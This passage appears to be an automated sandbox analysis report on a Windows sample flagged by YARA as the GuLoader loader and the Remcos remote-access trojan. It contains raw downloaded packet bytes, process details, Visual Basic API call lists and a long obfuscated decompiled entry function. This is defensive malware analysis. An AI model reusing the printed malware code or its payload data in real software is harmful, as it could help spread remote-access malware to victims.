0d 5a 2d 62 c1 86 84 07 26 e3 fe 87 ff 40 fe f5 66 3b ec 6d 00 4c cc 91 69 ae d5 bd 75 a6 d5 8a 18 6f 66 20 93 e6 a1 6b 9b ac f5 34 83 6e b9 05 67 e8 ba 9a c9 75 cf e9 ba 3a 64 69 73 d2 14 2f cf 59 ce 2c 87 0b f5 22 c6 d3 3e 21 99 83 04 bd af fb 74 72 3d f1 bf d5 f5 73 1a f6 51 a8 e5 ed fb f7 3c 18 70 a3 a7 52 e4 41 cf bd f1 69 d6 d1 b9 4e 81 72 b4 2e 38 50 9e 73 f7 49 ee 52 35 1b 3e c4 0c da 83 50 12 b1 a0 8a 06 40 d2 4b 4b 80 be 32 9f ff c1 fa ed ec ac 2c d8 a9 18 d2 69 c8 86 30 ee 1a e1 61 08 2a 4a 37 dd 5a 48 41 d5 ac fa 8a e8 f1 49 f8 81 30 c4 c9 00 30 70 0b 57 5b 99 cb 09 e5 4f a2 fa c8 52 f2 5a 4e 80 dd 89 ad 4d 26 2f f7 72 18 24 b7 38 b5 02 e7 17 2e f3 f9 56 40 ce 8f 79 5b af c8 0c 15 17 8e ca b4 d4 4e 5d 9c cc d6 64 64 85 dc 4e b3 a8 1b 3f a3 f8 15 94 93 b4 27 de 3a 43 d1 26 a4 f0 36 5e ef 78 e6 dd 4b 1f 40 e0 5b 05 12 8e e3 b3 6a a2 48 8d fe 13 86 0f 01 3b e4 f7 fc 24 3b f1 47 c2 e8 91 8b 55 50 75 18 cf 41 5f 45 bf 42 cc 53 6e 2b dd d3 4f cd 9c 17 9e ce 9e 79 98 7b 5c ba 2c 8d a5 2e 00 d4 d0 a2 aa 51 14 5c 46 68 d6 ca 8f 44 c4 5c 96 03 c9 8f 8a 15 22 80 64 de a8 14 fd db cc 55 7f e6 6b b8 c3 24 ad ed 04 33 ea c8 54 f2 b6 0c f6 0b 0e 7f e5 64 0b e9 a8 a4 07 c4 8a 8f 65 82 8c 3a bf
              Data Ascii: re]HAcLc\j=.:;RQ-N|\f=U@ZQZZN]ddz#N?':C&6^xK@[jH;$;Xx?\Td* N[(z(N\uqPH!Q"d"SZGC(PJhT:D],`H:W`%O$\UT/9a{|Bpvqhmc9`;e`@b0d/s3TvM]a08sKeya`$D(rP'd]ti^&1UAA8WoYQ<$-58];|%yBO`5@E2ldA:|5HKm4E-_/fW>&fM<J;$'lOij3!yFc5-eIadVxZ%qqg_;;:J=.Y6Ta|tnEd?1:G>W`E%_Z=kn"wCp|YZ-b&@f;mLiuof k4ngu:dis/Y,">!tr=sQ<pRAiNr.8PsIR5>P@KK2,i0a*J7ZHAI00pW[ORZNM&/r$8.V@y[N]ddN?':C&6^xK@[jH;$;GUPuA_EBSn+Oy{\,.Q\FhD\"dUk$3Tde:
              Sep 27, 2021 14:57:47.578381062 CEST8146INData Raw: 10 c8 fb db de 4c d1 45 87 2b a8 b0 63 17 c0 3b 29 79 c5 12 e5 68 4c 75 4c 21 24 ea 1b 70 6b c9 fc fd 4b 80 bd 4e d3 4e f2 42 75 26 fc 41 c9 6c a6 51 03 98 86 4c e2 9f 80 42 68 ed f3 11 e5 4e 50 11 a4 d0 50 59 37 6f 3a 76 59 10 47 21 a7 e7 cd 8b
              Data Ascii: LE+c;)yhLuL!$pkKNNBu&AlQLBhNPPY7o:vYG!p8FZ8/]Nai[WpwnJj%b")w"PN^AT&t2C)>sOp*$(<t}Z]S:Ey\BA%{lwEIAR5
              Sep 27, 2021 14:57:47.578398943 CEST8147INData Raw: 7e a4 fa 0e 74 57 c7 b1 99 82 6a 04 54 84 0d c6 43 e2 9a cd 7f 18 a3 a9 36 58 f9 7e d8 08 2b b5 18 a4 bd f1 58 25 46 ae be 00 5c 5d 53 05 c4 42 a2 4d 5d a8 a7 81 88 37 20 3e ee ff 54 6c 08 ce 96 61 2a 8d 2c b6 30 e2 56 a0 f8 b6 5b 5e cb 97 fb fe
              Data Ascii: ~tWjTC6X~+X%F\]SBM]7 >Tla*,0V[^|yg`0B:RfX}XkO9us%[9g~YaC8<?@1;`Cp"T&)K/Z;Vr'm>dj>S$!?8(h!t#;@7P
              Sep 27, 2021 14:57:47.578416109 CEST8148INData Raw: c2 6e 2a c7 ff 36 e7 4a a0 a1 b5 a2 3c 04 71 e1 30 e4 95 17 67 13 b6 99 ad 6f d1 a5 3f 47 a1 a1 7b 46 6a 65 79 f4 1e 6b cf a6 0f 24 91 22 fd be a7 9b 91 b6 ed a2 1f 6c 03 4a 8f 9a 7b d6 7d c3 08 d3 b7 e6 26 ab 20 6e 9d 29 87 33 71 ca 84 5a bb 87
              Data Ascii: n*6J<q0go?G{Fjeyk$"lJ{}& n)3qZ}Wi#+l2Lo'?00lS7O?(zTJ2xpHAkl!FO(p"|(8 =R^V"I1]'3yH"p 4?hu!cR e-
              Sep 27, 2021 14:57:47.690390110 CEST8150INData Raw: d3 5a 1b 33 c7 55 8e 6f d6 d1 90 8e df 2f 76 2a 38 3a 9e 19 f6 a1 e6 56 35 5b fd 91 c7 18 a0 66 f5 83 cb dd 8d 29 d1 b0 3f da 84 35 f5 fe 13 15 ee ec 42 a1 13 41 06 d0 69 c8 d6 bb 21 f2 f7 63 08 6a 1a df 40 4a 48 41 8c f5 7e 4a 9c d6 1f 75 c4 38
              Data Ascii: Z3Uo/v*8:V5[f)?5BAi!cj@JHA~Ju8OPW[;.\^N"&}$f^VI_^1iB#V7KD*C{i!*j]=b|2+GcWq4$o+OP&z{$kZ!J
              Sep 27, 2021 14:57:47.690427065 CEST8151INData Raw: 53 b4 2a 3f 1c 24 12 ae 8d 73 58 f0 b6 95 69 3f 18 0b 6b a7 15 57 f0 45 83 cb 32 1f 9a 91 93 b8 a4 6a eb 2c 7c b4 c3 9f 1c 4b 4e 4b 82 51 96 21 99 37 00 88 3d 3f b1 fa ad b5 b7 6a 64 cd d6 c5 fa 08 db 5a 40 6a 22 45 28 27 b4 a4 95 9a 45 46 49 34
              Data Ascii: S*?$sXi?kWE2j,|KNKQ!7=?jdZ@j"E('EFI44EbS{eW[#pw0@LHEP7;!5~9L<qC3xxd0Hwu!;F;$W5@H@=G|
              Sep 27, 2021 14:57:47.690449953 CEST8153INData Raw: 80 0a 57 12 cb 80 a0 47 89 3d f3 91 85 59 19 6b f5 0c 76 39 0d a4 39 9a 1a dc 48 c7 3e 4f ef 14 e9 d8 32 df 0d c6 a4 b6 0a 22 c4 14 44 47 66 64 5f 2b b1 de 58 c0 29 11 6c 0e 12 a6 95 57 e4 c0 fc 73 d3 ca c8 e9 e5 d6 3a 16 5a ca f2 0f 43 56 64 89
              Data Ascii: WG=Ykv99H>O2"DGfd_+X)lWs:ZCVd.@]8M;|uhIyIC]6k\*/].`DAOga7UfN%3 mH;C_*nV} dX?<j|L i
              Sep 27, 2021 14:57:47.690466881 CEST8154INData Raw: cb d1 58 2c 5f 90 7b a4 62 57 90 34 eb f5 8d 44 33 8e fc d9 12 ed 3a 63 a3 fa 41 c3 8a 8d 43 1a 27 80 b4 31 dd ac 9a 1e ac a9 0f 2b 26 12 16 a9 e2 18 3c cc 54 a6 f2 b7 14 a9 37 02 33 ca 76 a2 59 7d 3e 49 14 9a 84 05 46 08 db 91 37 1a 4a a2 4f 0b
              Data Ascii: X,_{bW4D3:cAC'1+&<T73vY}>IF7JO-Qp%SAPg(g >-Ta_oyDhDy1dH3|<jal^!Q($_e^*rO:r|Ys?wh"Q1'3nc^M!u{(*s
              Sep 27, 2021 14:57:47.690485954 CEST8155INData Raw: f4 b3 80 ff 71 1c 98 92 29 86 5c 01 44 d0 f0 74 37 1b 82 f4 cc b2 f4 47 c2 01 62 8b 55 50 26 93 92 49 0c ad 4c b1 33 ac 91 5e d1 58 81 9e 74 3e 6b 31 61 f2 56 f0 84 52 49 60 5a d1 89 91 2c 29 a2 da c5 d7 03 7c fd 19 06 09 c8 d7 5e f4 18 b4 40 1a
              Data Ascii: q)\Dt7GbUP&IL3^Xt>k1aVRI`Z,)|^@Bdw1(.wC2gd:.o;]]'P+5-;R={=gGfo2g~k+L@(USrap(=8;>bRR9;
              Sep 27, 2021 14:57:47.690504074 CEST8157INData Raw: 10 ae 13 e7 4f 03 a2 79 b5 a0 fa cf b9 dc 2f 4c b5 77 c4 50 7f 96 8c ba 8e 54 c3 cf 3d 92 68 c6 85 d8 f9 e7 98 ea ea 17 29 0c 03 12 7b 75 0e 44 a6 6e ca 81 22 01 73 6e 43 3d b4 91 49 0f 13 55 e8 d7 7a 0c 08 e1 26 9c 1d 15 b8 eb ee 18 69 ba 76 01
              Data Ascii: Oy/LwPT=h){uDn"snC=IUz&iv(!nMAmS. -V8cb"opPR{5}CVY~++Y3nv6=k*&|q9D%/5-E,wT.yp9~!F~qig[o4qqH~Le9kw
              Sep 27, 2021 14:57:47.690521955 CEST8158INData Raw: 14 fd db cc 0a 21 bd e0 5d 9e e7 fc 66 51 df 61 85 bc 1a 28 fe 09 f4 57 15 e5 0e 0b 01 8f 45 05 7d a6 1a a8 6e 39 b0 f7 10 c8 93 aa 72 f8 39 0f ff 30 55 3b fc 8a bb cb e9 6a 4e 16 af 0d 5c 9d fd e1 fc 50 42 13 52 25 ae 02 67 4f ec 69 12 08 f2 f7
              Data Ascii: !]fQa(WE}n9r90U;jN\PBR%gOi)`[p@x&~RE_lLfj5]tDNapq<G48&^mYZ]Hf2SzPu:^o&^tqQx.[Zh##mM>;


              Code Manipulations

              Statistics

              CPU Usage

              Click to jump to process

              Memory Usage

              Click to jump to process

              High Level Behavior Distribution

              Click to dive into process behavior distribution

              Behavior

              Click to jump to process

              System Behavior

              Analysis Process: DW1VgsgHNU.exe PID: 6420 Parent PID: 4216

              General

              Start time:14:53:45
              Start date:27/09/2021
              Path:C:\Users\user\Desktop\DW1VgsgHNU.exe
              Wow64 process (32bit):true
              Commandline:'C:\Users\user\Desktop\DW1VgsgHNU.exe'
              Imagebase:0x400000
              File size:184320 bytes
              MD5 hash:B30B9C1D23026FF24F234A07A557DC83
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:Visual Basic
              Yara matches:
              • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000001.00000002.499884696.00000000005A0000.00000040.00000001.sdmp, Author: Joe Security
              Reputation:low

              Chronological Activities

              Analysis Process: DW1VgsgHNU.exe PID: 2800 Parent PID: 6420

              General

              Start time:14:55:44
              Start date:27/09/2021
              Path:C:\Users\user\Desktop\DW1VgsgHNU.exe
              Wow64 process (32bit):true
              Commandline:'C:\Users\user\Desktop\DW1VgsgHNU.exe'
              Imagebase:0x400000
              File size:184320 bytes
              MD5 hash:B30B9C1D23026FF24F234A07A557DC83
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Yara matches:
              • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000019.00000002.767385154.0000000000948000.00000004.00000020.sdmp, Author: Joe Security
              Reputation:low

              Chronological Activities

              Disassembly

              Code Analysis

              Reset < >

                Analysis Process: DW1VgsgHNU.exe PID: 6420 Parent PID: 4216 DW1VgsgHNU.exeCOMMON

                Executed Functions

                Function 00423090, Relevance: 84.5, APIs: 31, Strings: 17, Instructions: 527COMMON
                Download Yara Rule
                APIs
                • __vbaStrCopy.MSVBVM60 ref: 004230EE
                • __vbaAryConstruct2.MSVBVM60(?,00403C54,00000003), ref: 004230FF
                • #696.MSVBVM60(00403BC8), ref: 0042310A
                • __vbaStrCat.MSVBVM60(00403BDC,2:2), ref: 004238A8
                • __vbaStrMove.MSVBVM60 ref: 004238B5
                • __vbaStrCat.MSVBVM60(00403BE4,00000000), ref: 004238BD
                • __vbaStrMove.MSVBVM60 ref: 004238C4
                • #541.MSVBVM60(00689DCC,00000000), ref: 004238CB
                • __vbaStrVarMove.MSVBVM60(00689DCC), ref: 004238D5
                • __vbaStrMove.MSVBVM60 ref: 004238E0
                • __vbaFreeStrList.MSVBVM60(00000002,006460D0,006C3177), ref: 004238EC
                • __vbaFreeVar.MSVBVM60 ref: 004238FE
                • __vbaHresultCheckObj.MSVBVM60(00000000,003A6688,00402194,00000254), ref: 00423923
                • #692.MSVBVM60(?,knapstvlens,lysavisens), ref: 0042393F
                • __vbaVarTstNe.MSVBVM60(?,?), ref: 00423957
                • __vbaFreeVar.MSVBVM60 ref: 00423963
                • #648.MSVBVM60(?), ref: 00423980
                • __vbaFreeVar.MSVBVM60 ref: 00423989
                • __vbaNew2.MSVBVM60(00402634,0042B3B4), ref: 0042399D
                • __vbaHresultCheckObj.MSVBVM60(00000000,02B2E9BC,00402624,0000004C), ref: 004239C2
                • __vbaHresultCheckObj.MSVBVM60(00000000,?,00403C20,00000028), ref: 004239E2
                • __vbaFreeObj.MSVBVM60 ref: 004239EB
                • __vbaNew2.MSVBVM60(00402634,0042B3B4), ref: 00423A03
                • __vbaHresultCheckObj.MSVBVM60(00000000,02B2E9BC,00402624,00000038,?,?,?,?,0000000A), ref: 00423A73
                • __vbaVar2Vec.MSVBVM60(?,0000000A,?,?,?,?,0000000A), ref: 00423A81
                • __vbaAryMove.MSVBVM60(?,?,?,?,?,?,0000000A), ref: 00423A8F
                • __vbaFreeVar.MSVBVM60(?,?,?,?,0000000A), ref: 00423A98
                • __vbaFreeStr.MSVBVM60(00423B14), ref: 00423AEA
                • __vbaAryDestruct.MSVBVM60(00000000,?), ref: 00423AF8
                • __vbaFreeStr.MSVBVM60 ref: 00423AFD
                • __vbaAryDestruct.MSVBVM60(00000000,?), ref: 00423B11
                Strings
                Memory Dump Source
                • Source File: 00000001.00000002.499736142.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000001.00000002.499730880.0000000000400000.00000002.00020000.sdmp Download File
                • Associated: 00000001.00000002.499764903.000000000042B000.00000004.00020000.sdmp Download File
                • Associated: 00000001.00000002.499770029.000000000042D000.00000002.00020000.sdmp Download File
                Similarity
                • API ID: __vba$Free$Move$CheckHresult$DestructNew2$#541#648#692#696Construct2CopyListVar2
                • String ID: dO$*^s$*cc$2:2$3to$5#$:Y-$>?$M'h$QZ`$SYPHILOPHOBIC$Yd%$k:$knapstvlens$lysavisens$w1l$=X
                • API String ID: 621974014-1160925713
                • Opcode ID: 7317fa0633ba80f212d070f45eea684accd05508d95c1b95bd48290d991f1925
                • Instruction ID: 14b7fb0d206b855dc8d9e2890887f1fb55dc232d21a98730a1675608f3f03196
                • Opcode Fuzzy Hash: 7317fa0633ba80f212d070f45eea684accd05508d95c1b95bd48290d991f1925
                • Instruction Fuzzy Hash: 115283B4A002498FCB04DFA8C588ADDFBF1BB48308F14C26AD9597B355C7B5594ACFA4
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00401460, Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 245COMMON
                Download Yara Rule
                C-Code - Quality: 15%
                			_entry_() {
				signed char _t63;
				signed int _t64;
				intOrPtr* _t66;
				signed int _t67;
				intOrPtr* _t68;
				signed char _t69;
				signed int _t70;
				signed int _t71;
				intOrPtr* _t72;
				intOrPtr* _t73;
				signed int _t75;
				signed int _t76;
				signed char _t78;
				signed int _t80;
				void* _t81;
				signed char _t82;
				intOrPtr* _t85;
				intOrPtr* _t88;
				intOrPtr* _t90;
				signed int* _t91;
				void* _t93;
				void* _t94;
				void* _t95;
				intOrPtr* _t96;
				intOrPtr* _t97;
				void* _t100;
				intOrPtr* _t102;
				intOrPtr* _t106;
				void* _t107;
				signed int _t110;
				void* _t125;
				signed int _t126;
				intOrPtr* _t128;
				signed int _t132;
				void* _t133;
				intOrPtr* _t134;

				_push("VB5!6&*"); // executed
				L00401458(); // executed
				 *_t63 =  *_t63 + _t63;
				 *_t63 =  *_t63 + _t63;
				 *_t63 =  *_t63 + _t63;
				 *_t63 =  *_t63 ^ _t63;
				 *_t63 =  *_t63 + _t63;
				_t64 = _t63 - 1;
				 *_t64 =  *_t64 + _t64;
				 *_t64 =  *_t64 + _t64;
				 *_t64 =  *_t64 + _t64;
				 *_t64 =  *_t64 + _t93;
				asm("cld");
				_t66 = _t128;
				asm("fsubr dword [esi+0x3d]");
				 *_t66 =  *_t66 + _t66;
				 *_t85 =  *_t85 + _t66;
				 *_t66 =  *_t66 + _t66;
				 *_t66 =  *_t66 + _t66;
				 *((intOrPtr*)(_t66 + 0x71)) =  *((intOrPtr*)(_t66 + 0x71)) + _t80;
				_push(cs);
				_t67 = _t66 +  *((intOrPtr*)(_t85 + 0x52));
				_t94 = _t93 + 1;
				_push(_t94);
				_t102 = _t100 + 2;
				_t110 = _t107 - 0xffffffffffffffff;
				 *_t102 =  *_t102 + _t67;
				_t88 = _t85 + 1 - 1 + 1;
				 *((intOrPtr*)(_t88 + 0x30e + _t110 * 2)) =  *((intOrPtr*)(_t88 + 0x30e + _t110 * 2)) + _t88;
				 *_t67 =  *_t67 + _t67;
				 *_t67 =  *_t67 ^ _t67;
				_t132 = (_t64 |  *(_t93 + _t64 * 2 - 0x2b734eba)) +  *((intOrPtr*)(_t80 + 0x7e6e97a6));
				if(_t132 <= 0) {
					L3:
					asm("rcl dword [ebx], cl");
					 *_t67 =  *_t67 + _t67;
					 *_t67 =  *_t67 + _t67;
					 *_t67 =  *_t67 + _t67;
					 *_t67 =  *_t67 + _t67;
					 *_t67 =  *_t67 + _t67;
					 *_t67 =  *_t67 + _t67;
					 *_t67 =  *_t67 + _t67;
					 *_t67 =  *_t67 + _t67;
					 *_t67 =  *_t67 + _t67;
					 *_t67 =  *_t67 + _t67;
					 *_t67 =  *_t67 + _t67;
					 *_t67 =  *_t67 + _t67;
					 *_t67 =  *_t67 + _t67;
					 *_t67 =  *_t67 + _t67;
					 *_t67 =  *_t67 + _t67;
					 *_t67 =  *_t67 + _t67;
					asm("scasd");
					 *_t67 =  *_t67 + _t67;
					 *_t67 =  *_t67 + _t94;
					L4:
					 *_t67 =  *_t67 + _t67;
					 *((intOrPtr*)(_t67 + _t67)) =  *((intOrPtr*)(_t67 + _t67)) + _t88;
					_push(_t94);
					_push(_t132);
					_t95 = _t94 - 1;
					_push(_t80);
					_push(_t132);
					_push(_t95);
					 *0x53000b01 =  *0x53000b01 + _t88;
					_push(_t67);
					_t68 = _t67 - 1;
					_t133 = _t132 - 1;
					_t90 = _t88;
					_t81 = _t80 - 1;
					_push(_t81);
					 *_t90 =  *_t90 + _t81;
					 *_t68 =  *_t68 + _t68;
					_t96 = _t95 + 1;
					 *_t96 =  *_t96 + _t68;
					 *((intOrPtr*)(_t81 + _t90)) =  *((intOrPtr*)(_t81 + _t90)) + _t133;
					 *((intOrPtr*)(_t81 + 0x49)) =  *((intOrPtr*)(_t81 + 0x49)) + _t96;
					_push(_t68);
					_t69 = _t68 - 1;
					_t134 = _t133 - 1;
					_t91 = _t90 - 1;
					_t82 = _t81 - 1;
					_t125 = 0xffffffffe69a4403;
					_push(_t82);
					 *0xe56 =  *0xe56 + _t96;
					_t97 = _t96 -  *((intOrPtr*)(_t110 + 1 - 0xffffffffffffffff));
					 *_t69 =  *_t69 + _t69;
					asm("loopne 0x11");
					 *_t69 =  *_t69 + _t69;
					asm("a16 sbb al, 0x0");
					 *((intOrPtr*)(_t69 + _t69 + 0x46)) =  *((intOrPtr*)(_t69 + _t69 + 0x46)) + _t69;
					_t106 = _t102 - 0xffffffffffffffff + _t102 - 0xffffffffffffffff;
					 *_t97 =  *_t97 + _t82;
					 *_t69 =  *_t69 + _t69;
					 *_t91 =  *_t91 + _t69;
					_push(es);
					_t34 =  &(_t91[0xfffffffff34d221d]);
					 *_t34 = _t91[0xfffffffff34d221d] + _t97;
					if( *_t34 >= 0) {
						 *_t82 =  *_t82 + _t91;
						_pop(es);
						asm("rol byte [ebx], 0x0");
						 *_t69 = _t91 +  *_t69;
						0xff401588();
						 *_t69 =  *_t69 + _t69;
						 *_t97 =  *_t97 + _t69;
						_push(es);
						_t91[0x1b] = _t91 + _t91[0x1b];
						asm("popad");
						 *[gs:bx+si] =  *[gs:bx+si] ^ _t69;
						asm("sbb [ebx], al");
						asm("lock add al, cl");
						_t82 = _t82 +  *_t91 |  *(_t106 - 0xfe10fc);
						_t134 = _t134 +  *_t82;
						 *_t69 =  *_t69 + _t69;
						 *_t82 =  *_t82 + _t69;
						_t69 = _t69 + 0x6e694c00;
					}
					asm("outsb");
					 *[gs:eax] =  *[gs:eax] ^ _t69;
					_pop(ss);
					_t126 = _t125 + _t69;
					 *_t69 =  *_t69 | _t69;
					 *((intOrPtr*)(_t69 + _t126 * 8)) =  *((intOrPtr*)(_t69 + _t126 * 8)) + _t69;
					 *_t69 =  *_t69 | _t69;
					 *0xd98 =  *0xd98 + _t69;
					asm("enter 0xa, 0x0");
					 *_t97 =  *_t97 + 1;
					_t70 = _t69 + 6;
					 *_t70 =  *_t70 + _t70;
					 *((intOrPtr*)(_t70 + 0x7004069)) =  *((intOrPtr*)(_t70 + 0x7004069)) + _t91;
					 *_t70 =  *_t70 + _t70;
					 *((intOrPtr*)(_t126 + 0x70040)) =  *((intOrPtr*)(_t126 + 0x70040)) + _t91;
					 *_t70 =  *_t70 + _t70;
					 *_t70 =  *_t70 + _t70;
					 *_t70 =  *_t70 + _t91;
					_t71 = _t70 & 0x00070040;
					 *_t71 =  *_t71 + _t71;
					_t72 = _t71 + 1;
					 *_t106 =  *_t106 + _t72;
					 *_t72 =  *_t72 + _t72;
					 *((intOrPtr*)(_t134 + 0x40)) =  *((intOrPtr*)(_t134 + 0x40)) + _t72;
					 *_t106 =  *_t106 + _t72;
					 *_t72 =  *_t72 + _t72;
					 *_t134 =  *_t134 + _t72;
					_t73 = _t72 + 1;
					 *_t106 =  *_t106 + _t73;
					 *_t73 =  *_t73 + _t73;
					_t75 = _t73 + _t73 &  *(_t73 + _t73);
					es = 0x7004025;
					 *_t75 =  *_t75 + _t75;
					 *((intOrPtr*)(_t82 + 0x40)) =  *((intOrPtr*)(_t82 + 0x40)) + _t97;
					 *_t106 =  *_t106 + _t75;
					 *_t75 =  *_t75 + _t75;
					 *_t75 =  *_t75 + _t75;
					_t76 = _t75 &  *_t75;
					es = es;
					 *_t76 =  *_t76 + _t76;
					_t78 = _t76 + _t76 &  *(_t76 + _t76);
					_push(_t78);
					 *_t78 =  *_t78 + _t78;
					_t57 = _t82 + 0x7e6e97a6;
					 *_t57 =  *((intOrPtr*)(_t82 + 0x7e6e97a6)) + _t78;
					if( *_t57 > 0) {
						asm("repe adc [ebx+0x8b], ah");
						 *_t78 =  *_t78 + _t78;
						 *_t78 =  *_t78 + _t78;
						 *_t78 =  *_t78 + _t78;
						 *_t78 =  *_t78 + _t78;
						 *_t78 =  *_t78 + _t78;
						 *_t78 =  *_t78 + _t78;
						 *_t78 =  *_t78 + _t78;
						 *_t78 =  *_t78 + _t78;
						 *((intOrPtr*)(_t78 + 1)) =  *((intOrPtr*)(_t78 + 1)) + _t97;
						 *_t78 =  *_t78 + _t78;
						 *_t78 =  *_t78 + _t78;
						 *_t78 =  *_t78 + _t78;
					}
					 *_t78 =  *_t78 + _t78;
					 *_t78 =  *_t78 + _t78;
					 *_t78 =  *_t78 + _t78;
					 *_t78 =  *_t78 + _t78;
					 *_t78 =  *_t78 + _t78;
					 *_t78 =  *_t78 + _t78;
					 *_t78 =  *_t78 + _t78;
					 *_t91 =  *_t91 | _t78;
					 *_t78 =  *_t78 + _t78;
					 *_t78 =  *_t78 + _t78;
					 *_t78 =  *_t78 + _t78;
					 *0x4c004014 =  *0x4c004014 + 0x4c004014;
					 *0x4c004014 =  *0x4c004014 + _t97;
					 *0x4c004014 =  *0x4c004014 + 0x4c004014;
					asm("invalid");
					 *0x4BDAC755 = 0x4c004014;
					goto __ecx;
				}
				asm("repe adc [ebx+0x26886f8b], ah");
				_t18 = _t102 + 0x37;
				 *_t18 =  *(_t102 + 0x37) ^ _t132;
				if( *_t18 > 0) {
					goto L4;
				}
				asm("adc eax, 0x398128ce");
				asm("o16 salc");
				_t80 = _t80 ^  *(_t88 - 0x48ee309a);
				asm("stosb");
				 *((intOrPtr*)(_t67 - 0x2d)) =  *((intOrPtr*)(_t67 - 0x2d)) + _t67;
				goto L3;
			}







































                0x00401460
                0x00401465
                0x0040146a
                0x0040146c
                0x0040146e
                0x00401470
                0x00401472
                0x00401474
                0x00401475
                0x00401477
                0x00401479
                0x0040147b
                0x00401487
                0x00401488
                0x00401489
                0x0040148f
                0x00401491
                0x00401493
                0x00401495
                0x00401497
                0x0040149a
                0x0040149b
                0x004014a1
                0x004014a3
                0x004014a9
                0x004014ab
                0x004014ac
                0x004014ae
                0x004014af
                0x004014b6
                0x004014ba
                0x004014bc
                0x004014c7
                0x004014eb
                0x004014eb
                0x004014f1
                0x004014f3
                0x004014f5
                0x004014f7
                0x004014f9
                0x004014fb
                0x004014fd
                0x004014ff
                0x00401501
                0x00401503
                0x00401505
                0x00401507
                0x00401509
                0x0040150b
                0x0040150d
                0x0040150f
                0x00401511
                0x00401512
                0x00401514
                0x00401517
                0x00401517
                0x00401519
                0x0040151e
                0x0040151f
                0x00401520
                0x00401524
                0x00401525
                0x00401527
                0x00401528
                0x0040152f
                0x00401530
                0x00401533
                0x00401534
                0x00401535
                0x00401537
                0x00401538
                0x0040153a
                0x0040153c
                0x0040153d
                0x0040153f
                0x00401542
                0x00401545
                0x00401546
                0x00401549
                0x0040154a
                0x0040154b
                0x0040154c
                0x0040154d
                0x0040154e
                0x00401554
                0x00401556
                0x00401558
                0x0040155a
                0x0040155c
                0x0040155f
                0x00401563
                0x00401565
                0x00401567
                0x00401569
                0x0040156b
                0x0040156c
                0x0040156c
                0x00401570
                0x00401573
                0x00401575
                0x00401576
                0x00401579
                0x0040157b
                0x00401582
                0x00401584
                0x00401586
                0x00401587
                0x0040158a
                0x0040158b
                0x0040158f
                0x00401591
                0x00401594
                0x0040159a
                0x0040159c
                0x0040159e
                0x004015a0
                0x004015a0
                0x004015a4
                0x004015a5
                0x004015a8
                0x004015a9
                0x004015ab
                0x004015ad
                0x004015b0
                0x004015b2
                0x004015b9
                0x004015bd
                0x004015bf
                0x004015c1
                0x004015c3
                0x004015c9
                0x004015cb
                0x004015d2
                0x004015d9
                0x004015db
                0x004015dd
                0x004015e2
                0x004015e6
                0x004015e7
                0x004015e9
                0x004015eb
                0x004015ef
                0x004015f1
                0x004015f3
                0x004015f6
                0x004015f7
                0x004015f9
                0x004015fd
                0x00401600
                0x00401601
                0x00401603
                0x00401607
                0x00401609
                0x0040160b
                0x0040160d
                0x00401610
                0x00401611
                0x00401615
                0x00401618
                0x00401619
                0x0040161b
                0x0040161b
                0x00401626
                0x00401628
                0x0040162f
                0x00401631
                0x00401633
                0x00401635
                0x00401637
                0x00401639
                0x0040163b
                0x0040163d
                0x0040163f
                0x00401645
                0x00401647
                0x00401649
                0x00401649
                0x0040164a
                0x0040164c
                0x0040164e
                0x00401650
                0x00401652
                0x00401654
                0x00401656
                0x00401658
                0x0040165a
                0x0040165c
                0x0040165e
                0x00401665
                0x00401667
                0x0040166a
                0x0040166f
                0x00401671
                0x00401676
                0x00401676
                0x004014c9
                0x004014d0
                0x004014d0
                0x004014d3
                0x00000000
                0x00000000
                0x004014d6
                0x004014db
                0x004014e0
                0x004014e8
                0x004014e9
                0x00000000

                APIs
                Strings
                Memory Dump Source
                • Source File: 00000001.00000002.499736142.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000001.00000002.499730880.0000000000400000.00000002.00020000.sdmp Download File
                • Associated: 00000001.00000002.499764903.000000000042B000.00000004.00020000.sdmp Download File
                • Associated: 00000001.00000002.499770029.000000000042D000.00000002.00020000.sdmp Download File
                Similarity
                • API ID: #100
                • String ID: VB5!6&*
                • API String ID: 1341478452-3593831657
                • Opcode ID: d7497170fae8b8ed2b903cd0e9b50451e028a76d534d3bdeb8e90549fd3b8333
                • Instruction ID: 542af500f5b2e05c6b8c94c0219025500403f8f387b0386592e1285b7037487e
                • Opcode Fuzzy Hash: d7497170fae8b8ed2b903cd0e9b50451e028a76d534d3bdeb8e90549fd3b8333
                • Instruction Fuzzy Hash: 57710C6108E7C15FD3138B708CA66A13FB0AE53228B0E46EBD4D5CE0E3D25D495AC7A3
                Uniqueness

                Uniqueness Score: -1.00%

                Non-executed Functions

                Function 00402520, Relevance: 1.3, Strings: 1, Instructions: 8COMMON
                Download Yara Rule
                Strings
                Memory Dump Source
                • Source File: 00000001.00000002.499736142.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000001.00000002.499730880.0000000000400000.00000002.00020000.sdmp Download File
                • Associated: 00000001.00000002.499764903.000000000042B000.00000004.00020000.sdmp Download File
                • Associated: 00000001.00000002.499770029.000000000042D000.00000002.00020000.sdmp Download File
                Similarity
                • API ID:
                • String ID: $@
                • API String ID: 0-1661285546
                • Opcode ID: b1befa007f387eef648ca0b00ffba4e43053b8b9cee6ac3b10e6fb3213b82ebc
                • Instruction ID: f265f33f51b577c451686bb36c16e6163af3027241b8a05e002670247bb8424f
                • Opcode Fuzzy Hash: b1befa007f387eef648ca0b00ffba4e43053b8b9cee6ac3b10e6fb3213b82ebc
                • Instruction Fuzzy Hash: 69B01220394501BAD62196586D5993813C0D3427C03A00C33F800F11D0C7B8DE40822D
                Uniqueness

                Uniqueness Score: -1.00%

                Analysis Process: DW1VgsgHNU.exe PID: 2800 Parent PID: 6420 DW1VgsgHNU.exeCOMMON

                Executed Functions

                Function 0056ED2E, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 79nativeCOMMON
                Download Yara Rule
                APIs
                • NtProtectVirtualMemory.NTDLL(000000FF,00000008,0000000C,?,?,?,?,?,00000040,00000000,?), ref: 0056EE3B
                Strings
                Memory Dump Source
